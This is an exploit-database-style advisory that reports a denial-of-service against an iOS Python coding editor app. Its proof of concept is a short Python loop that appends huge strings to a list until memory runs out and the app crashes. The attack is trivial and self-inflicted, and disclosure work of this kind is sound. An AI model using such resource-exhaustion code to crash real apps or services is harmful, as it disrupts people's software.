# Exploit Title: Python Coding Editor & IDE IOS app ( DOS ) # Date: 02/14/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://apps.apple.com/us/developer/cloudbit-d-o-o/id1387318660 # Software Link: https://apps.apple.com/it/app/python-coding-editor-ide-app/id6444399635?l=en-GB # Version: 1.11.4 # Tested on: IOS 18.3.1 POC: 1. Create a new file any name.py 2. Put the following code: array = [] while True: array.append("A" * 10000000) 3. Once you run the code the app will crash.